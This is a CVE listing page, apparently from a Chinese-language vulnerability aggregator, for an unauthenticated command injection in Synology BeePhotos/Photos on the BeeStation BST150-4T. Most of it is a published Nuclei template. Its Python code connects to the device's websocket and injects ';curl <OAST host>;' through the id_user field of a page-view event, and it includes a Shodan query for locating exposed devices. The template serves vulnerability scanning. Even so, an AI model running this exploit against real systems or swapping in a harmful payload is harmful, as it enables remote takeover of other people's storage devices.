CVE-2024-10443: Synology BeeStation BST150-4T - Unauthenticated Command Injection

日期: 2025-08-01 | 影响软件: Synology BeeStation BST150-4T | POC: 已公开

漏洞描述

Improper neutralization of special elements used in a command ('Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote attackers to execute arbitrary code via unspecified vectors.

PoC代码[已公开]

id: CVE-2024-10443

info:
  name: Synology BeeStation BST150-4T - Unauthenticated Command Injection
  author: iamnoooob,pdresearch
  severity: critical
  description: |
    Improper neutralization of special elements used in a command ('Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote attackers to execute arbitrary code via unspecified vectors.
  reference:
    - https://www.synology.com/en-us/security/advisory/Synology_SA_24_18
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-10443
    cwe-id: CWE-77
    epss-score: 0.69894
    epss-percentile: 0.98624
    cpe: cpe:2.3:a:synology:photos:*:*:*:*:*:diskstation_manager:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: synology
    product: photos
    framework: diskstation_manager
    shodan-query: html:"BeeStation"
  tags: unauth,synology,rce,websocket,diskstation

variables:
  OAST: "{{interactsh-url}}"

code:
  - engine:
      - py
      - python3 # requires python to be pre-installed on system running nuclei

    source: |
        import websocket,os,json # pip install websocket-client
        url = "ws://"+os.getenv('Hostname')+"/FotoSocketIo/socket.io/?transport=websocket&EIO=4"
        ws = websocket.create_connection(url)
        initial = ws.recv()
        ws.send("40")
        response = ws.recv()
        payload = {
            "id_user": ";curl "+os.getenv('OAST')+";",
            "timestamp": 0,
            "location": "xxd"
        }
        event_message = f'42["page-view",{json.dumps(payload)}]'
        ws.send(event_message)
        ws.close()

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "dns"
# digest: 4a0a0047304502200c520e0378568db2d7924f230807017beef1733f4f9d720642a47ceaf367ced00221009a3738866903e35ff9f1db4665839ee7e83b7bee716a06c186eeb0c499569b3f:922c64590222798bb761d5b6d8e72950